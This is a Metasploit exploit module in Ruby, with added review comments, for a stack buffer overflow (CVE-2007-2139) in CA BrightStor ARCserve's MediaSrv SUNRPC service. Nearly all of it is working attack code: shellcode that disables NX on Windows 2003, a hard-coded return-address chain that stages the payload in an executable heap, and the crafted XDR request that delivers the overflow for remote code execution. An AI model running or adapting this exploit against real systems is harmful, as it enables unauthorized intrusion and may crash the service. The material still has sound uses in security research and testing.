##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for CVE-2007-2139 (ZDI-07-022): a stack buffer overflow in the
# MediaSrv SUNRPC service of CA BrightStor ARCserve. All transport is provided by
# the Msf::Exploit::Remote::SunRPC mixin: `exploit` opens a TCP SUNRPC session to
# program 0x6097e, issues a single XDR-encoded call to procedure 0xf5 whose
# string argument carries the overflow data, then hands over to the payload
# handler.
#
# Two buffer layouts exist, chosen in `exploit` by the selected target:
#  - the two non-NX targets place the payload at target['Off'] and follow it
#    with a short-jump / return-address / back-jump trailer;
#  - the "NX Support" target uses a fixed sequence of hard-coded addresses
#    (documented step by step in `exploit`) to stage the payload into an
#    executable heap.
# Every address in the module is specific to one build of the vulnerable
# library and is not user-configurable; the Notes block leaves reliability,
# stability and side effects as UNKNOWN.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::SunRPC

  # Registers module metadata (name, references, payload constraints, targets).
  #
  # @param info [Hash] metadata merged by update_info; defaults to {}.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CA BrightStor ArcServe Media Service Stack Buffer Overflow',
        'Description' => %q{
          This exploit targets a stack buffer overflow in the MediaSrv RPC service of CA
          BrightStor ARCserve. By sending a specially crafted SUNRPC request, an attacker
          can overflow a stack buffer and execute arbitrary code.
        },
        'Author' => [ 'toto' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2007-2139'],
          [ 'OSVDB', '35326' ],
          [ 'BID', '23635'],
          [ 'ZDI', '07-022'],
        ],
        'Privileged' => true,
        'Platform' => 'win',
        'Payload' => {
          # 0x300 bytes is the budget for the encoded payload in both layouts:
          # 0x260 + 0x300 fits inside the 0x600-byte NX buffer and
          # target['Off'] + 0x300 stays below the 0x73c trailer offset.
          'Space' => 0x300,
          # '_' is a bad char presumably because `exploit` uses '_' as the field
          # delimiter when framing the request string — confirm against the service.
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c_",
          'Prepend' =>
            # Disable NX on 2k3 to upload data on the stack
            # (service crashes if the stack is switched to the heap)
            # The stub checks the PEB OS version fields and only acts when
            # MajorVersion == 5, MinorVersion == 2 and BuildVersion > 0xece;
            # on any other OS it falls through to the payload unchanged.
            "\x64\x8b\x0d\x30\x00\x00\x00" + # mov ecx, dword ptr fs:[0x30] ; PEB
            "\x83\xb9\xa4\x00\x00\x00\x05" + # cmp dword ptr [ecx+0xa4], 5 ; MajorVersion == 5
            "\x75\x30" + # jnz after
            "\x83\xb9\xa8\x00\x00\x00\x02" + # cmp dword ptr [ecx+0xa8], 2 ; MinorVersion == 2
            "\x75\x27" + # jnz after
            "\x81\xb9\xac\x00\x00\x00\xce\x0e\x00\x00" + # cmp dword ptr [ecx+0xac], 0xece ; BuildVersion (> SP0)
            "\x76\x1b" + # jbe after
            "\x8d\x89\xa8\x00\x00\x00" + # lea ecx, [ecx+0xa8]
            "\xba\x00\x03\xfe\x7f" + # mov edx, 0x7ffe0300
            "\xb8\xed\x00\x00\x00" + # mov eax, 0xed
            "\x6a\x04" + # push 4
            "\x51" + # push ecx
            "\x6a\x22" + # push 22
            "\x6a\xff" + # push -1
            "\x6a\xff" + # push -1 (padding)
            "\xff\x12", # call dword ptr[edx]
          # Framework prepends a stack-pointer adjustment so the decoding payload
          # does not overwrite its own stack.
          'StackAdjustment' => -10000,

        },
        # 'Ret' and 'Off' are only read on the non-NX path in `exploit`.
        # NOTE(review): the NX target's 'Ret' of 0x41414141 is a placeholder that
        # is never used — that path relies solely on the hard-coded addresses
        # written in `exploit`.
        'Targets' => [
          ['BrightStor Arcserve 9.0 (?) - 11.5 SP2 (Windows 2000)', { 'Ret' => 0x1002b715, 'Off' => 0x304 } ],
          ['BrightStor Arcserve 9.0 (?) - 11.5 SP2 (Windows 2003)', { 'Ret' => 0x1002b715, 'Off' => 0x300 } ],
          ['BrightStor Arcserve 11.1 - 11.5 SP2 (Windows All - NX Support)', { 'Ret' => 0x41414141 } ],
        ],
        'DisclosureDate' => '2007-04-25',
        'DefaultTarget' => 0,
        # NOTE(review): all three ratings are UNKNOWN. Given that both layouts
        # overwrite well past the payload with fixed addresses, a failed attempt
        # most likely leaves the service down (CRASH_SERVICE_DOWN) — worth
        # confirming and recording here so operators see it before running.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Builds the overflow buffer for the selected target, sends it as one SUNRPC
  # call and then waits for the payload handler.
  #
  # Observable traits of this traffic (all fixed by the module): TCP SUNRPC to
  # program 0x6097e, version 1, procedure 0xf5, with a string argument of
  # 0x600 + 20 (NX) or 0xA64 + 20 (non-NX) bytes, mostly alphanumeric and
  # wrapped in '_'-delimited fields.
  def exploit
    # Arguments are (protocol, program number, program version); see the
    # SunRPC mixin for the connection it opens.
    sunrpc_create('tcp', 0x6097e, 1)

    # NOTE(review): the layout is chosen by matching the target's display
    # name; renaming the third target would silently fall back to the non-NX
    # layout. A flag in the target hash (next to 'Ret'/'Off') would be more
    # robust than `=~ /NX/`.
    if target.name =~ /NX/
      # summary:
      #
      # 1) get the payload address
      # 2) copy the payload into a fixed buffer (data section)
      # 3) allocate an executable heap buffer (to bypass NX)
      # 4) copy back the payload into the heap
      # 5) jmp to the payload in the heap
      #
      # step 1: jmp around the atoi pointers
      #
      # add esp, 20h
      # retn
      #
      # step 2: get a pointer to the stack in ecx
      #
      # xor eax, eax
      # mov ecx, dword ptr fs:[0]
      # cmp dword ptr [ecx+4], offset __unwind_handler
      # jnz end
      # [...]
      # end:
      # retn
      #
      # step 3: mov the stack pointer in eax
      #
      # mov eax, ecx
      # add esp, 20h
      # retn
      #
      # step 4: set fffff824h in esi
      #
      # pop esi
      # retn
      #
      # step 5: add esi to eax (eax points to the payload in the stack)
      #
      # add eax, esi
      # pop esi
      # retn
      #
      # step 6: set edi to a buffer we can write (6d515301h)
      #
      # pop edi
      # retn
      #
      # step 7: copy the payload to the buffer
      #
      # push eax
      # push edi
      # call _strcpy_0
      # pop ecx
      # pop ecx
      # retn
      #
      # step 8: set ecx to ffffffh
      #
      # pop ecx
      # retn
      #
      # step 9: mov ecx to eax (ffffffff -> MEM_EXECUTABLE)
      #
      # mov eax, ecx
      # add esp, 20h
      # retn
      #
      # step 10: create an executable heap
      #
      # push 0
      # cmp [esp+4+arg_0], eax
      # push 1000h
      # setz al
      # push eax
      # call ds:HeapCreate ; create a new heap (executable for NX)
      # test eax, eax
      # mov hHeap, eax
      # jz short loc_6d5071b5
      # call ___sbh_heap_init
      # test eax, eax
      # jnz short loc_6d5071b8
      # push hHeap
      # call ds:HeapDestroy
      # loc_6d5071b5:
      # xor eax, eax
      # retn
      # loc_6d5071b8:
      # push 1
      # pop eax
      # retn
      #
      # step 11: Allocate a new heap buffer (size 01060101h)
      #
      # push hHeap
      # call ds:HeapAlloc
      # pop edi
      # pop esi
      # retn
      #
      # step 12: set esi to the buffer containing the payload (6d515301h)
      #
      # pop esi
      # retn
      #
      # step 13: copy the payload to the heap (executable)
      #
      # push esi
      # push eax
      # call _strcpy_0
      # pop ecx
      # pop ecx
      # pop esi
      # retn
      #
      # step 14: go to the heap
      #
      # call eax
      #
      # step 15:
      # if 2k3 the prepend data disables NX to upload and execute
      # data on the stack
      #
      # step 16: w00t!

      # 0x600-byte filler; every address below is then patched in at a fixed
      # offset as a little-endian dword. The "ret N" labels match the numbered
      # steps above. None of these values come from the target hash.
      data = Rex::Text.rand_text_alphanumeric(0x600)

      # ret 1
      data[0x100, 4] = [ 0x6d5010e4 ].pack('V')

      # used to store the result of atoi
      data[0x108, 4] = [ 0x6d51652b ].pack('V')
      data[0x10C, 4] = [ 0x6d51652b ].pack('V')
      data[0x110, 4] = [ 0x6d51652b ].pack('V')
      data[0x114, 4] = [ 0x6d51652b ].pack('V')
      data[0x118, 4] = [ 0x6d51652b ].pack('V')
      data[0x11C, 4] = [ 0x6d51652b ].pack('V')

      # ret 2
      data[0x124, 4] = [ 0x6d50b27a ].pack('V')

      # ret 3
      data[0x128, 4] = [ 0x6d5010e2 ].pack('V')

      # ret 4
      data[0x14C, 4] = [ 0x6d50aa6d ].pack('V')
      data[0x150, 4] = [ 0xfffff824 ].pack('V')

      # ret 5
      data[0x154, 4] = [ 0x6d50aa6b ].pack('V')

      # ret 6
      data[0x15C, 4] = [ 0x6d5057a0 ].pack('V')
      data[0x160, 4] = [ 0x6d515301 ].pack('V')

      # ret 7
      data[0x164, 4] = [ 0x6d50b938 ].pack('V')

      # ret 8
      data[0x178, 4] = [ 0x6d502df0 ].pack('V')
      data[0x17C, 4] = [ 0xffffffff ].pack('V')

      # ret 9
      data[0x180, 4] = [ 0x6d5010e2 ].pack('V')

      # ret 10
      data[0x1a4, 4] = [ 0x6d507182 ].pack('V')

      # ret 11
      data[0x1a8, 4] = [ 0x6d505c2c ].pack('V')
      data[0x1ac, 4] = [ 0xffffffff ].pack('V')
      data[0x1b0, 4] = [ 0x01060101 ].pack('V')

      # ret 12
      data[0x1bc, 4] = [ 0x6d50aa6d ].pack('V')
      data[0x1c0, 4] = [ 0x6d515301 ].pack('V')

      # ret 13
      data[0x1c4, 4] = [ 0x6d50f648 ].pack('V')

      # ret 14
      data[0x1cc, 4] = [ 0x6d506867 ].pack('V')

      # Encoded payload sits at 0x260; with 'Space' => 0x300 it ends by 0x560,
      # inside the 0x600-byte buffer.
      data[0x260, payload.encoded.length] = payload.encoded

    else
      # Non-NX layout: payload at the target-specific offset, followed at a
      # fixed distance by a 2-byte short jump, the target return address and a
      # 5-byte near jump back. 0xA64 leaves room for off + 0x744 + 5 with
      # either 'Off' value.
      data = Rex::Text.rand_text_alphanumeric(0xA64)
      off = target['Off']

      data[off, payload.encoded.length] = payload.encoded
      data[off + 0x73c, 2] = "\xeb\x06"
      data[off + 0x740, 4] = [ target.ret ].pack('V')
      data[off + 0x744, 5] = "\xe9\xb7\xf8\xff\xff"
    end

    # Frame the buffer in '_'-separated fields; the payload therefore must not
    # contain '_' (hence its presence in BadChars).
    data = "_" + data + "_1_1_1_1_1_1_1_1_1"

    # XDR-encode the call arguments; `data` is the string parameter.
    request = Rex::Encoder::XDR.encode(1, 1, 2, 2, 2, data, 3, 3)

    print_status("Trying target #{target.name}...")

    # Best-effort send: the service is presumably not expected to answer
    # cleanly after the overflow, so errors are ignored and select() is used as
    # a 20-second wait to let the payload run.
    # NOTE(review): the bare rescue also hides connection failures that mean
    # the request never reached the service, and `ret` is assigned but never
    # read. `rescue StandardError => e` plus `vprint_error(e.message)` would
    # keep the best-effort behaviour while leaving a trace for the operator.
    begin
      ret = sunrpc_call(0xf5, request)
      select(nil, nil, nil, 20)
    rescue
    end

    # Tear down the RPC session, then give the payload handler a chance to
    # service an incoming session before the module disconnects.
    sunrpc_destroy

    handler
    disconnect
  end
end